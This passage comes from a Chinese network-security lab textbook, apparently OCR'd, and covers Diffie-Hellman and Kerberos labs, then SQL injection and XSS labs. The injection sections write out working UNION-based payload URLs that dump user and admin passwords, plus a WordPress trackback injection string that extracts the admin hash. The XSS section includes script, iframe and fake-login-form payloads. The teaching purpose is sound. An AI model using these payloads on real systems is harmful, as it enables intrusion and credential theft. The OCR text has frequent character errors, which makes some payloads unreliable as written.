(4) 编译 程序 ， 生 成 动态 链接 库 DH_student.dll. 

(5) 将 DH _ serverexe 文件 和 DH. student.dll 文件 复制 到 服务 器 的 同一 个 目录 内 。 同 
FÉ, Xf DH clientexe 文件 和 DH student.dll 文件 复制 到 客户 端的 同一 目录 内 。 

(6) 运行 服务 器 程序 ， 填 入 监听 端口 和 各 项 实验 参数 ， 单 击 【 开 始 监 听 】 按 钮 ， 如 
图 13-13 所 示 。 

CD 运行 客户 端 程序 , 填 入 服务 器 IP 地 址 、 端 口号 以 及 各 项 实验 参数 。 重复 单 击 【 下 
一 步 】 按 钮 ， 初 步 执行 Diffie-Hellman 协议 的 各 个 步骤 ， 如 图 13-14 所 示 。 

(8) 观察 客户 端 程序 和 服务 器 端 程序 的 实验 结果 。 


【实验 报告 】 
C1) 详细 描述 实验 过 程 。 


完成 DH_fun.cpp 文件 中 的 各 个 函数 实现 
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图 13-13 服务 器 端 配置 示意 图 
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图 13-14 ”客户 端 配置 示意 图 
(2) 给 出 实验 数据 、 实 验 结 果 及 其 数学 计算 过 程 。 


【思考 题 】 

C1) 根据 Diffie-Hellman 协议 过 程 ， 分 析 其 安全 缺陷 。 查 阅 相关 资料 ， 提 出 改进 
方法 。 

(2) 使 用 现 有 实验 程序 ， 如 何 实现 中 间 人 攻击 的 演示 实验 ? 


133 Kerberos 


【实验 目的 】 
掌握 Kerberos 认证 协议 的 详细 交互 过 程 。 
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【原理 简介 】 

Kerberos 协议 是 由 美国 麻 省 理工 学 院 设计 的 计算 机 网 络 认证 协议 。Kerberos 协议 以 
“票据 ”为 基础 ， 提 供 让 网 络 实体 在 不 安全 的 网 络 中 相互 认证 身份 的 功能 。Kerberos 协议 
适合 基于 客户 端 -服务 器 的 网 络 应 用 , 可 以 实现 客户 端 、 服务 器 之 间 的 相互 认证 。 Kerberos 
协议 可 以 防止 非法 窃取 和 重 放 攻击 。Kerberos 默认 使 用 对 称 加 密 算法 ， 需 要 可 信 第 三 方 
的 支持 ， 也 可 以 在 相应 的 交互 环节 使 用 非 对 称 加 密 算 法 。Kerberos 的 默认 端口 为 88。 
Kerberos 认证 协议 有 很 广泛 的 应 用 。 自 Windows 2000 以 来 的 操作 系统 ， 都 把 Kerberos 
作为 默认 的 认证 协议 。 在 UNIX, Linux 和 MAC OS 等 主流 操作 系统 上 ， 也 有 相关 的 
Kerberos 应 用 软件 。 

Kerberos 以 对 称 Needham-Schroeder 协议 为 基础 。 其 中 的 可 信 第 三 方 被 称 为 密 钥 发 
放 中 心 (Key Distribution Center, KDC). KDC 由 逻辑 上 独立 的 两 部 分 构成 : 认证 服务 
器 (Authentication Server, AS) 和 票据 获取 服务 器 (Ticket Granting Server, TGS). 

KDC 与 每 个 网 络 实体 之 问 共 享 一 个 密 钥 。KDC 和 网 络 实体 使 用 这 个 密 钥 来 相互 认 
证 身份 。 对 于 KDC 与 网 络 实体 之 间 和 两 个 网 络 实体 之 间 的 通信 过 程 ，KDC 会 产生 会 话 
密 钥 ， 用 来 对 信息 进行 加 密 。Kerberos 的 安全 性 与 其 中 的 短期 认证 信息 有 很 大 关系 ， 这 

下 面 给 出 Kerberos 协议 的 简要 交互 过 程 。 

(1) 客户 端 与 AS 相互 认证 身份 ，AS 将 一 个 带 有 时 惟 的 票据 (客户 端 -AS 票据 ) 发 
送 给 客户 端 。 

(2) 客户 端 使 用 客户 端 -AS 票据 向 TGS 证 明 自 己 的 身份 ， 并 请 求 某 个 服务 器 上 的 某 
项 服务 。 

G) 如 果 客 户 端 有 权利 使 用 其 请 求 的 服务 ， 则 TGS 将 另 一 票据 (客户 端 -服务 器 票 
据 ) 发 送 给 客户 端 。 

(4) 客户 端 使 用 客户 端 -服务 器 票据 向 目标 服务 器 证 明 身份 ， 服 务 器 验证 票据 之 后 ， 
开始 提供 相应 服务 。 

下 面 将 通过 分 析 Kerberos 的 典型 流量 , 来 详细 了 解 Kerberos 协议 的 交互 过 程 和 数据 
格式 。 


【实验 环境 】 

Kerberos 协议 示例 流量 实验 框图 如 图 13-15 所 示 。 
105.3.1 
KDC 


客户 端 
10.1.12.2 


虚拟 服务 器 组 
13-15 Kerberos 协议 示例 流量 实验 框图 


示例 流量 来 自 于 局 域 网 环境 ， 客 户 端 和 KDC 使 用 Windows XP 操作 系统 。 采 用 虚拟 
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机 技术 实现 虚拟 服务 器 组 ， 模 拟 网 络 中 的 不 同 服务 。 示 例 流量 文件 为 kerberos.pcap。 实 
验 主机 采用 Windows XP Professional 操作 系统 ， 安 装 Wireshark 1.2.2. 


EM 

【实验 步 又】 

(1) 单 击 Wireshark 1.2.2 图 标 ， 运 行 Wireshark 1.2.2 应 用 软件 。 

(2) 选择 FilelOpen， 打 开 Kerberos 流量 示例 文件 kerberos.pcap。 

(3) 分 析 Kerberos 协议 AS-REQ 数据 包 ， 在 示例 流量 中 编号 为 3。 单 击 Kerberos 
AS-REQ 旁 的 加 号 图 标 ， 展 开 数 据 包 结构 。AS-REQ 数据 包 结 构 如 图 13-16 所 示 。 
© Kerberos AS-REQ 

Pyno: 5 
MSG Type: AS-REQ (10) 
@ padata: PA-ENC-TIMESTANP PA-PAC-REQUEST 
= KDC_REQ_BODY 
Padding: 0 
Œ KDCOptions: 40810010 (Forwardable, Renewable, Canonicalize, Renewable OK) 
® Client Name (Principal): des 
Realm: DENYDC 
5 Server Name (Service and Instance): krbtgt/DENYDC 
till: 2037-09-13 02:48:05 (UTC) 
rtime: 2037-09-13 02:48:05 (UTC) 
Nonce: 197451134 
@ Encryption Types: rcd-hmac rcá-hmac-old rc4-add des-cbc-ad5 des-cbc-crc rcd-hmac-exp 
& HostAddresses: XP1<20> 


图 13-16 AS-REQ 数据 包 结构 示意 图 


客户 端 使 用 AS-REQ 数据 包 来 向 AS 请 求 客户 端 -AS 票据 。 

Pvno 域 用 来 表示 协议 版 本 ， 目 前 为 固定 常数 5S。MSG Type 域 表示 Kerberos 消息 类 
型 。padata 域 为 pre-authentication data 的 简写 ， 包 括 Kerberos 协议 所 需要 的 认证 参数 ， 
T EARS 

KDC REQ BODY 域 为 AS-REQ 消息 的 具体 内 容 。KDCOptions 域 表示 KDC 的 设置 
选项 ， 用 来 支持 不 同 的 KDC 功能 。Client Name 域 和 Realm 域 表 示 客 户 端的 名 称 和 所 属 
域 的 名 称 。 在 本 例 中 ， 客 户 端 名 称 为 des， 所 属 域 为 Realm。Server Name 域 包 括 客户 端 
所 要 求 的 服务 器 所 属 域名 称 和 具体 服务 。 在 例子 中 ， 服 务 器 所 属 域名 称 为 DENYDC， 所 
要 求 服务 为 krbtgt。 till 域 表 示 客 户 端 所 要 求 的 票据 过 期 时 间 。rtime 域 表 示 客 户 端 所 要 求 
的 票据 更 新 时 间 ， 本 域 是 可 选 的 。Nonce 域 包含 一 个 由 客户 端 生成 的 随机 数 ， 这 个 随机 
数 将 用 于 认证 本 次 请 求 ， 防 止 重 放 攻 击 。Encryption Types 域 表 示 客 户 端 所 支持 的 加 密 算 
法 和 杂凑 算法 。HostAddresses 域 表 示 客 户 端的 地 址 信息 ， 这 是 一 个 可 选 域 ， 但 是 如 果 不 
使 用 也 不 能 为 空 ， 需 要 填充 。 

(4) 分 析 Kerberos 协议 AS-REP 数据 包 ， 在 示例 流量 中 编号 为 4。AS-REP 数据 包 结 
构 如 图 13-17 所 示 。 

在 客户 端 使 用 AS-REQ 消息 请 求 后 ，KDC 使 用 AS-REP 消息 来 进行 回应 ， 将 客户 
端 -AS 票据 返回 给 客户 端 。 

Client Realm 域 和 Client Name 域 表示 客户 端 所 属 域名 和 客户 端 名 称 。Ticket 域 包含 客 
户 端 -AS 票据 。Tkt-vno 域 表示 票据 版 本 号 ， 目 前 为 常数 5。Realm 域 表示 客户 端 所 要 求 服 
务 器 所 属 域 的 名 称 。Server Name 域 包括 客户 端 所 要 求 的 服务 器 所 属 域名 称 和 具体 服务 。 
两 个 enc-part 均 为 加 密 信 息 ， 用 来 证 明 AS 的 身份 和 标识 一 次 请 求 ,防止 冒充 和 重 放 攻 击 。 
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© Kerberos AS-REP 
Pyno: 5 
MSG Type: AS-REP (11) 
由 padata: PA-PW-SALT 
Client Realm: DENYDC. COM 
由 Client Name (Principal): des 
E Ticket 
Tkt-vno: 5 
Realm: DENYDC. COM 
由 Server Name (Service and Instance): krbtgt/DENYDC. COM 
由 enc-part rcd-hmac 
 enc-part des-cbc-nd5 
Encryption type: des-cbc-nd5 (3) 
Kwo: 3 
enc-part: EDBCCOD67F3A4645254F086E6E2BFE2B7BBACT 2B346ADO5AB. . . 


图 13-17 AS-REP 数据 包 结构 示意 图 


(5) 分 析 Kerberos 协议 TGS-REQ 数据 包 ， 在 示例 流量 中 编号 为 5。TGS-REQ 数据 
包 结 构 如 图 13-18 所 示 。 


5 Kerberos TGS-REQ 
Pwno: 5 
MSG Type: TGS-REQ (12) 
由 padata: PA-TGS-REQ 
© KDC REQ BODY 
Padding: 0 
由 KDCOptions: 40800000 (Forwardable, Renewable) 
Realm: DENYDC.COM 
由 Server Name (Service and Host): host/xpl.denydc. com 
till: 2037-09-13 02:48:05 (UTC) 
Nonce: 197296424 
由 Encryption Types: rcd-hmac rcd-hmac-old rc4-md4 des-cbc-md5 des-cbc-crc 


图 13-18 TGS-REQ 数据 包 结构 示意 图 


在 取得 客户 端 -AS 票据 之 后 , 客户 端 使 用 TGS-REQ 消息 向 TGS 请 求 客户 端 -服务 器 
票据 。TGS-REQ 消息 中 各 个 域 的 含义 与 AS-REQ 消息 类 似 ， 请 读者 自己 进行 分 析 。 

(6) 分 析 Kerberos 协议 TGS-REP 数据 包 ， 在 示例 流量 中 编号 为 6。TGS-REP 数据 
包 结 构 如 图 13-19 所 示 。 


Ej Kerberos TGS-REP 
Pwo: 5 
MSG Type: TGS-REP (13) 
Client Realm: DENYDC.COM 
Client Name (Principal): des 
Ticket 
Tkt-vno: 5 
Realm: DENYDC. COM 
Æ Server Name (Service and Host): host/xpl.denydc. com 
B enc-part rcá-hmac 
Encryption type: rcd-hmac (23) 
Kwno: 2 
enc-part: E63BB88DD1D8F 8B5AAFE7B7GE59E4F 4 2E5E090B679E8A945. . . 
日 enc-part des-cbc-md5 
Encryption type: des-cbc-md5 (3) 
enc-part: TOE024FDB23293198556E63CA27554CF 3DD36D0A548E9215... 


图 13-19 TGS-REP 数据 包 结构 示意 图 


mg 


181 


mem 网络 安全 实验 教程 (第 2 版 ) — meenuuuuum 


在 收 到 客户 端的 TGS-REQ 消息 之 后 ，TGS 使 用 TGS-REP 消息 进行 回应 ， 将 客户 
端 -服务 器 票据 发 送 给 客户 端 。TGS-REP 消息 各 个 域 的 含义 与 AS-REP 消息 类 似 ， 请 读 
者 自己 进行 分 析 。 

【实验 报告 】 

(1) 详细 描述 实验 过 程 。 

(2) 分 析 AS-REQ、AS-REP、TGS-REQ、TGS-REP 消息 的 数据 包 结 构 ， 说 明 各 个 
域 所 包含 内 容 及 其 功能 。 

【思考 题 】 

(1) 根据 Kerberos 协议 认证 过 程 ， 分 析 其 可 抵御 的 网 络 攻 击 。 

(2) 查阅 相关 资料 ， 指 出 Kerberos 协议 的 缺陷 及 现 有 改进 方法 。 
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444 SQL 注入 攻击 


14.1.1 通过 页 面 请 求 的 简单 SQL 注入 


【实验 目的 】 
掌握 SQL 注入 攻击 的 原理 ， 了 解 通过 页 面 请 求 的 SQL 注入 攻击 。 
【原理 简介 】 


SQL (Structured Query Language) 即 结构 化 查询 语言 ， 是 专 为 数据 库 而 建立 的 操作 
MER, 是 一 种 功能 齐全 的 数据 库 语 言 。 对 于 SQL 注入 的 定义 , 目前 并 没有 统一 的 说 法 。 
微软 中 国 技术 中 心 从 两 个 方面 进行 了 描述 ， 即 第 一 是 脚本 注入 式 的 攻击 ， 第 二 是 恶意 用 
户 输入 用 来 影响 被 执行 的 SQL 脚本 。 就 其 本 质 而 言 , SQL 注入 式 攻击 就 是 攻击 者 把 SQL 
命令 插入 到 Web 表单 的 输入 域 或 页 面 请 求 的 查询 字符 串 , 由 于 在 服务 器 端 未 经 严格 的 有 
效 性 验证 ， 而 欺骗 服务 器 执行 恶意 的 SQL fit. Scis E, SQL 注入 是 存在 于 有 数据 库 连 
接 的 应 用 程序 中 的 一 种 漏洞 ， 攻 击 者 通过 在 应 用 程序 中 预先 定义 好 的 查询 语句 结尾 加 上 
额外 的 SQL 语句 元 素 ， 欺 驴 数 据 库 服务 器 执行 非 授权 的 查询 。 这 类 应 用 程序 一 般 是 基于 
Web 的 应 用 程序 ， 它 允许 用 户 输入 查询 条 件 ， 并 将 查询 条 件 嵌 入 SQL 请 求 语 句 中 ， 发 送 
到 与 该 应 用 程序 相关 联 的 数据 库 服务 器 中 去 执行 。 通 过 构造 一 些 畸 形 的 输入 ， 攻 击 者 能 
够 操作 这 种 请 求 语句 去 获取 预先 未 知 的 结果 。 

由 于 SQL 注入 攻击 使 用 的 是 SQL 语法 ， 使 得 这 种 攻击 具有 普 适 性 。 从 理论 上 讲 ， 
对 于 所 有 基于 SQL 标准 的 数据 库 软件 都 是 有 效 的 。 目 前 以 ASP. JSP. PHP. Perl 等 技 
术 与 Oracle、SQL Server、MySQL、Sybase 等 数据 库 相 结合 的 Web 应 用 程序 均 发 现存 在 
SQL 注入 漏洞 。SQL 注入 的 原理 很 简单 ， 需 要 具备 一 点 关于 SQL 的 基本 知识 。SQL 中 
最 常用 到 的 就 是 select 语句 ， 即 选择 语句 。 比 如 “select* from table where field = value” 
这 条 语句 ， 其 含义 是 从 表 tabel 中 选 出 字段 field=value 的 所 有 记录 。 看 如 下 这 句 简单 的 
PHP 代码 : 


$result = mysql_query ("select * from user where userId=" . $ REQUEST["id"]); 


可 以 看 出 ， 这 名 代码 对 页 面 请 求 所 传递 的 参数 没有 做 任何 操作 。 若 恶意 用 户 在 参数 
后 加 入 其 他 的 SQL 语句 ， 如 UNION 语句 等 ， 则 可 以 进行 SQL 注入 攻击 。 
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【实验 环境 】 
本 地 计算 机 上 需 装 有 Web 浏览 器 ;远程 计算 机 (假设 IP 地 址 为 192.168.1.101) 上 
运行 有 缺陷 的 Web 程序 。 


【实验 步骤 】 

(1) 打开 Web 浏览 器 ， 在 地 址 栏 中 输入 “http://192.168.1.101/sql.php?id=1”， 可 以 看 
到 这 个 网 页 的 效果 ， 是 用 来 查询 id 与 相应 的 用 户 名 ， 如 图 14-1 所 示 。 

(2) 在 地 址 栏 中 输入 “http://192.168.1.101/sql.php?id=1”， 可 以 看 到 返回 了 SQL 错 
误 ， 说 明 这 个 页 面 没有 对 错误 的 参数 进行 过 滤 ， 因 此 可 能 存在 SQL 注入 漏洞 。 

G) 下 面 就 要 开始 猜测 这 个 Web 程序 所 查询 的 表 有 多 少 个 字段 了 ， 首先 从 一 个 字段 
开始 试 起 。 在 地 址 栏 中 输入 “http://192.168.1.101/sql.php?id=1/**/union/**/select/**/1 ", 
可 以 看 到 返回 了 SQL 错误 , 于 是 继续 猜测 ， 最终 在 输入 “http://192.168.1.101/sql.php?id= 
1/**/union/**/select/**/1,2,3” 后 可 以 得 到 正确 的 显示 ， 如 图 14-2 所 示 ， 说 明 这 个 表 有 三 
个 字段 。 


[Shttp://192.168....select/**/1,2,3 ET 


te) http://192.168....1/sql phpzid=1 + 会 [L http://192.168.1.101/sql.php?id=1 
http;//192.168.1.101/sqLphpzid-1 — |. — 一 一 
e 册 http://192.1 /sql.php?i 1luserl 
lluserl 1|2 
图 14-1 正常 运行 的 网 页 效果 图 14-2 ”猜测 出 表 的 字段 数 


(4) 接 下 来 要 猜测 表 名 。 在 地 址 栏 中 输入 “http://192.168.1.101/sql.php?id=1/**/union/ 
**/select/**/1,2,3/**/from/**/account”, FJ LAF PIRI] f SQL 错误 ， 于 是 继续 猜测 ， 最 终 
在 输入 “http://192.168.1.101/sql.php?id=1/**/union/**/select/**/],2,3/**/from/**/user” 后 可 
以 得 到 正确 的 显示 ， 如 图 14-3 所 示 ， 说 明 这 个 表 叫 作 user. 

(5) 现在 猜测 user 表 中 的 三 个 字段 的 字段 名 。 在 地 址 栏 中 输入 “http://192.168.1. 
101/sql.php?id=1/**/union/**/select/**/id,2,3/**/from/**/user”, 可 以 看 到 返回 了 SQL 错误 ， 
于 是 继续 猜测 ， 在 输入 “http://192.168.1.101/sql.php?id=1/**/union/**/select/**/userld,2,3/ 
**/from/**/user” 后 可 以 得 到 正确 的 显示 。 于 是 接 下 来 猜测 另外 两 个 字段 名 ， 最终 在 输入 
“ http://192.168.1.101/sql.php?id=1/**/union/**/select/**/userld,userName,userPass/**/from/ 
**/user” 后 可 以 得 到 正确 的 显示 , 如 图 14-4 所 示 , 说 明 user 表 中 的 三 个 字段 分 别 为 userId、 
userName 和 userPass。 

http://192.168....*/from/**/user i+ | 
D) http://192.168...*/from/+*/user NN e (LU http;//192.168.1.101/sqLphp?id-1 


e @ [L http;//192.168.1.101/sql.php?id-1 


ESS = 1ļuser1 
ljuser1 2|user2 
1|2 3[user3 
图 14-3 ”猜测 出 表 名 图 14-4 ”猜测 出 表 中 的 字段 名 


可 以 看 出 , 这 时 Web 程序 传递 给 数据 库 的 SQL 语句 实际 上 是 “select * from user where 
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userld = 1 union select userld,userName,userPassfromuser”. HÁT SQL 语句 后 ， 能 获得 
user 数据 库 中 的 所 有 记录 ， 即 所 有 的 用 户 名 及 其 密码 。 但 由 于 Web 程序 只 显示 数据 的 前 
两 列 ， 因 此 这 两 条 语句 合并 之 后 显示 在 浏览 器 中 时 没有 userPass 这 一 列 。 

(6) 为 了 能 显示 出 userPass 这 一 列 , 在 地 址 栏 中 输入 “http:/192.168.1.101/sql.php?id= 
1000/**/union/**/select/**/userld,userName,3/**/from/**/user/**/union/**/select/**/userld, 
userPass,3/**/from/**/user", 结果 如 图 14-5 所 示 ， 浏 览 器 中 显示 出 所 有 用 户 的 userName 
及 userPass 。 

CI) 同样 地 ， 通 过 这 个 方法 也 可 以 得 到 这 个 数据 库 中 其 他 表 的 数据 。 例 如 在 地 址 栏 
"PAN.  http://192.168.1.101/sgl.php?id-1000/**/union/**/select/* */adminId,adminName,3/ 
**/from/**/admin/**/union/**/select/**/adminId,adminPass,3/**/from/**/admin", 则 可 以 得 
到 admin 表 中 的 数据 ， 管 理 员 数据 往往 存储 于 这 个 表 中 ， 结 果 如 图 14-6 所 示 。 


http://192.168....*/from/**/user 


e A [L http://192.168.1.101/sql. phprid=1 
is (5 http://192.168.../from/**/admin al WR 
2|user2 e 合 (L http;//192.168.1.101/sql.php?id-1 
3|user3 
1|userlpwd ljuser1 
2|user2pwd 1|admin 
3|user3pwd 1jadminpwd 
图 14-5 SQL 注入 结果 图 14-6 ”获得 管理 员 账号 和 密码 


对 于 这 个 实验 中 涉及 的 SQL 注入 漏洞 比较 好 解决 , 只 需 将 传 入 的 参数 转换 为 整数 即 
可 ， 即 将 $result = mysql_query("select * from user where userld = " . $ REQUEST["id"]); 这 
句 代 码 改 为 $result = mysql query("select * from user where userId = " . intval($_REQUEST 
["id"]));。 

【实验 报告 】 

(1) 详细 叙述 实验 过 程 ， 归 纳 出 SQL 注入 的 一 般 步 又 。 

(2) 分 析 在 本 实验 中 杜绝 SQL 注入 攻击 的 方法 与 效果 。 

【思考 题 】 

根据 实验 结果 分 析 如 何 防止 SQL 注入 攻击 。 


14.1.2 ”通过 表单 输入 域 注 入 WordPress 


【实验 目的 】 
了 解 通过 表单 输入 域 的 SQL 注入 攻击 ; 建立 使 用 Web 产品 时 的 安全 意识 。 
【原理 简介 】 


正如 14.1.1 节 所 说 ，SQL 注入 式 攻 击 的 本 质 就 是 攻击 者 把 SQL 命令 插入 到 Web 表 
单 的 输入 域 或 页 面 请 求 的 查询 字符 串 ， 由 于 在 服务 器 端 未 经 严格 的 有 效 性 验证 ， 而 欺骗 
服务 器 执行 恶意 的 SQL 命令 。 
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WordPress 是 一 个 广泛 使 用 的 Web 程序 ， 其 中 不 乏 各 种 安全 漏洞 。 本 实验 在 一 个 较 
早 的 版 本 上 进行 SQL 注入 攻击 ， 旨 在 说 明 SQL 注入 攻击 的 危害 性 ， 引 起 使 用 Web 产品 
时 的 安全 意识 。 

在 某 些 WordPress 版 本 中 , wp-includes/comment.php 中 的 do_trackbacks() 函 数 未 能 对 
用 户 的 输入 进行 有 效 的 检验 。 具 体 来 说 ， 下 面 这 段 代 码 中 : 


if ( $to ping ) { 
foreach ( (array) $to_ping as $tb_ping ) { 

$tb ping = trim($tb ping); 

if ( !in array($tb ping, $pinged) ) { 
trackback($tb ping, $post title, $excerpt, $post id); 
$pinged[] - $tb ping; 

) else ( 
$wpdb->query ( $wpdb-»prepare ("UPDATE $wpdb->posts SET to ping 
= TRIM(REPLACE(to ping, '$tb ping', '')) WHERE ID = 
sd", $post id) ); 


} 
变量 $tb_ping 被 传递 到 数据 库 的 查询 语句 中 ， 但 这 个 变量 没有 经 过 检验 。 因 此 任何 
可 以 更 新 trackback 的 用 户 都 能 通过 这 个 函数 执行 任意 的 SQL 语句 。 即 用 户 等 级 为 作者 
或 在 作者 之 上 的 用 户 都 可 以 利用 这 个 SQL 注入 漏洞 。 


【实验 环境 】 
本 地 计算 机 上 需 装 有 Web 浏览 器 ;远程 计算 机 (假设 IP 地 址 为 192.168.1.101) 上 
运行 WordPress 3.0.1 或 更 低 版 本 。 


【实验 步骤 】 

COD 打开 浏览 器 ， 在 地 址 栏 中 输入 “http://192.168.1.101/wordpress/wp-login.php”， 
以 作者 (需要 管理 员 提 前 建立 相关 账号 ) 身份 (这 里 账号 名 为 author) 登录 到 WordPress, 
如 图 14-7 所 示 。 

(2) 进入 控制 板 后 ， 可 以 看 到 author 本 身 没有 查看 用 户 的 权限 ， 即 无 法 获知 管理 员 
的 账号 ， 当 然 也 更 无 法 获取 其 密码 ， 如 图 14-8 所 示 。 


个 控制 板 


author 2 文章 
密码 加 媒体 
coocoo! | Q 评论 


Th rA 
图 14-7 以 author 登录 WordPress 图 14-8 author 没有 查看 用 户 的 权限 
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(3) 添加 新 的 文章 、 标 题 和 任意 内 容 ， 在 【发 送 Trackbacks $0] — Firp A 


AAA',")),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/wher 


e/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'”, 如 图 14-9 所 示 。 之 后 发 布 这 
篇 文章 。 


« 


SQLIEA 


固定 链接 : http: //192.168.1.101/wordpress/?p=3 


上 传 /插入 m Ae 可 视 化 ”HTML 


e] « Js (is (eju | fF fa 


Ü 
JRODUESE AIS RE (MDs fill) 


路 径 : p 


字数 :0 草稿 保存 于 3:34:42 Er. 


发 送 Trackbacks 
发 送 Trackbacks 到 : 
/wp_users/**/where/**/id=1),pos t content filtered-TRIM(REPLACE(to ping, ' 


图 14-9 添加 新 文章 


C4) 添加 文章 后 会 进入 更 新 文章 的 页 面 ， 在 【发 送 Trackbacks 到 】 一 栏 中 输入 
“ AAA\',")),post_title=(select/**/concat(user_login,'|' user_pass)/**/from/**/wp_users/**/wher 
e/**/id=1), post_content_filtered=TRIM(REPLACE(to_ping,’ AAA',")), post_title=(select/**/ 
concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered 
=TRIM(REPLACE(to_ping,”。 之 后 更 新 这 篇 文章 ， 并 等 待 服务 器 执行 命令 。 
(5) 查看 刚才 发 布 的 文章 ， 如 图 14-10 所 示 。 这 就 是 本 次 SQL 注入 实验 的 结果 ， 文 

章 的 标题 变 为 管理 员 的 账号 及 其 MDS 值 。 

admin|$P$BsAQW6Ywa3.gCdzj/sk4A 

/&pDp9QecC. 

获取 管理 员 账 号 及 密码 (D5 值 ) 


图 14-10 SQL 注入 结果 


(6) 到 相应 的 MD5 值 查询 网 站 查询 该 MDS 值 ， 可 以 得 到 管理 员 admin 的 密码 为 
admin888， 如 图 14-11 所 示 。 
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SPSBsAQW6Ywa3.gCdzj/sk4A/gpDp9Qec. 


La | 
查询 结果 : 
admin888 
图 14-11 获取 管理 员 账 号 的 密码 
【实验 报告 】 


〈1) 详 细 叙 述 实验 过 程 , 分 析 本 实验 是 如 何 利 用 WordPress 中 的 这 个 SQL 注入 漏洞 。 
(2) 分 析 如 何 获得 其 他 用 户 的 账号 和 密码 信息 。 


【思考 题 】 
在 使 用 Web 程序 时 ， 应 如 何 防止 SQL 注入 攻击 ? 


1442 ” 跨 站 脚本 攻击 


14.2.1 ” 跨 站 脚本 攻击 的 发 现 


【实验 目的 】 

了 解 跨 站 脚本 攻击 的 原理 ， 了 解 跨 站 脚本 攻击 的 危害 ;掌握 基本 的 发 现 跨 站 脚本 漏 
洞 的 方法 。 

【原理 简介 】 

跨 站 脚本 简称 XSS (Cross Site Script)， 其 基本 攻击 原理 是 : 用 户 提交 的 变量 没有 经 
过 完整 过 滤 HTML 字符 或 者 根本 就 没有 经 过 过 滤 就 放 到 了 数据 库 中 , 一 个 恶意 用 户 提交 
的 HTML 代码 被 其 他 浏览 该 网 站 的 用 户 访问 ， 通 过 这 些 HTML 代码 也 就 间接 控制 了 浏 
览 者 的 浏览 器 ， 就 可 以 做 很 多 的 事情 ， 如 : 窃取 敏感 信息 、 引 导 访 问 者 的 浏览 器 去 访问 
恶意 网 站 等 。 
一 般 来 说 ， 跨 站 脚本 攻击 有 两 种 方式 : 内 跨 站 (来 自 自身 的 攻击 ) 主 要 指 的 是 利用 程 
序 自身 的 漏洞 ， 构 造 跨 站 语句 ， 外 跨 站 (来 自 外 部 的 攻击 ) 主 要 指 的 是 自己 构造 XSS 跨 站 
漏洞 网 页 或 者 寻找 非 目 标 机 以 外 的 有 跨 站 漏洞 的 网 页 。 例 如 ， 当 要 渗透 一 个 站 点 时 ， 我 
们 自己 构造 一 个 有 跨 站 漏洞 的 网 页 ， 然 后 构造 跨 站 语句 ， 通 过 结合 其 他 技术 ， 如 社会 工 
程 学 等 ， 欺 骗 目 标 服 务 器 的 管理 员 打 开 。 

跨 站 脚本 攻击 危害 较 大 ， 主 要 有 以 下 几 点 。 

1. 针对 性 挂 马 

这 类 网 站 一 定 是 游戏 网 站 ， 银 行 网 站 或 者 是 关于 QQ、 淘 宝 或 者 影响 力 相 当 大 的 网 
站 ， 挂 马 〈 网 页 森马) 的 目的 无 非 是 盗号 或 者 批量 抓 肉鸡 。 
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2. 用 户 权 限 下 操作 
这 类 网 站 一 般 有 很 多 会 员 ， 而 且 这 些 会 员 会 执行 一 些 实质 性 的 操作 或 者 想 要 获取 一 
些 内 部 的 个 人 资料 ， 此 时 他 们 可 以 通过 XSS 对 已 登录 的 访问 者 进行 有 权限 操作 。 例 如 ， 
盗 取 用 户 Cookies， 从 而 获取 用 户 某 些 信息 或 者 进行 权限 下 的 相关 操作 。 


3. DoS 攻击 
这 同样 需要 一 个 访问 量 非 常 大 的 站 点 ， 可 以 通过 访问 此 页 的 用 户 不 间断 地 攻击 其 他 
站 点 ， 或 者 进行 局 域 网 扫描 等 。 


4. 实现 特殊 效果 
壁 如 在 百度 空间 的 插入 视频 、 插 入 版 块 ; 还 有 一 些 人 在 新 浪 博客 实现 了 特殊 效果 等 。 


【实验 环境 】 
本 地 计算 机 上 需 装 有 Web 浏览 器 ,远程 计算 机 (假设 IP 地 址 为 192.168.1.101) 上 


运行 有 缺陷 的 Web 程序 。 
【实验 步骤 】 


CD 打开 浏览 器 ， 在 地 址 栏 中 输入 “http:/192.168.1.101/xss.php?name=user”， 可 以 
看 到 这 个 网 页 的 效果 ,如 图 14-12 所 示 。 这 个 网 页 仅 是 简单 地 将 name 后 面 的 参数 打印 到 


屏幕 上 。 
L http://192.168...phpzname=user 


A [加 http://192.168.1.101/xss.php?name=user 


user 


图 14-12 正常 运行 的 网 页 效果 


(2) 通过 改变 地 址 栏 的 输入 ， 检 查 是 否 存 在 跨 站 脚本 漏洞 。 在 地 址 栏 中 输入 
“http://192.168.1.101/xss.php?name=<script>alert("XSS")</script>”, 即将 name 后 面 的 参数 
变 为 <script>alert("XSS")</script>。 若 这 个 网 页 没有 对 传递 的 参数 进行 过 滤 ， 则 会 执行 这 


个 脚本 ， 如 图 14-13 所 示 。 


A [L http://192.168.1.101/xss.php?name=<script>a — «lij 


e 


图 14-13 执行 脚本 的 效果 
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(3) 继续 检查 这 个 网 页 , 在 地 址 栏 中 输入 “http://192.168.1.101/xss.php?name=<iframe 
sre=http://192.168.1.101/xss.php?name=xss></iframe>”, 效果 如 图 14-14 所 示 。 可 以 看 出 ， 
这 个 网 页 中 被 嵌 套 了 另 一 个 网 页 。 若 嵌 套 进去 的 网 页 的 高 和 宽 都 是 0， 则 不 容易 被 人 发 
现 ， 因 此 浏览 这 个 网 页 的 用 户 在 不 经 意 间 就 浏览 了 另 一 个 网 页 ， 也 因此 可 能 遭 到 来 自 另 


一 个 网 页 的 攻击 。 
(3 http://192.16...%3C/iframe%3E 
P [^] i| http://192.168.1.101/xss.php?name=<iframe 
XSS 


BI 14-14 ERRER 


(4) 事实 上 ， 在 地 址 栏 中 输入 更 长 的 内 容 ， 可 以 实现 更 复杂 的 效果 ， 但 是 过 长 的 地 

址 也 容易 引起 用 户 的 怀疑 。 例 如 ， 在 地 址 栏 中 输入 “http:/192.168.1.101/xss.php? 
name=<title>Login</title><p>Login Please:</p><form action="http://192.168.1.101/record. 
php"><table><tr><td>username</td><td><input type=text length=20 name=username></td> 
</tr><tr><td>password:</td><td><input type-password length-20 name=password></td> 
</tr></table><input type=submit value=OK></form>”, HRW 14-15 所 示 。 若 是 用 户 不 
注意 提交 了 用 户 名 和 密码 ， 这 些 信 息 将 会 发 送 到 攻击 者 指定 的 地 方 。 

(Login l BEEN] 

e A |j http://192.168.1.101/xss.phpzname=<title> 

Login Please: 

username 


password: 
oK 


图 14-15 更 为 复杂 的 效果 


